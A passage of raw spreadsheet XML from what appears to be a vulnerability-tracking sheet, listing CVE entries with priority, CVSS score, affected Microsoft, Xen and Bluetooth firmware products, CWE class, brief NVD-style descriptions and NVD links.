          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78521</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78524</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78524</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78525</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78525</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78526</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr"/>
      <c r="K239" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78526</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78834</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78834</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79376</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-20</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>An issue in the l2cap_handle_data() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79376</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79602</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>A guest with a PCI device assigned that has at least a BAR on the IO port
space can trigger a BUG() in Xen.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79602</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80074</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80074</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80077</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80077</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80080</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80080</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80081</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps</t>
        </is>
      </c>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80081</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80083</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K247" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80085</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80085</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80096</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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9" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81352</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81352</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81385</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t>
        </is>
      </c>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81385</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81952</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81952</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81955</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
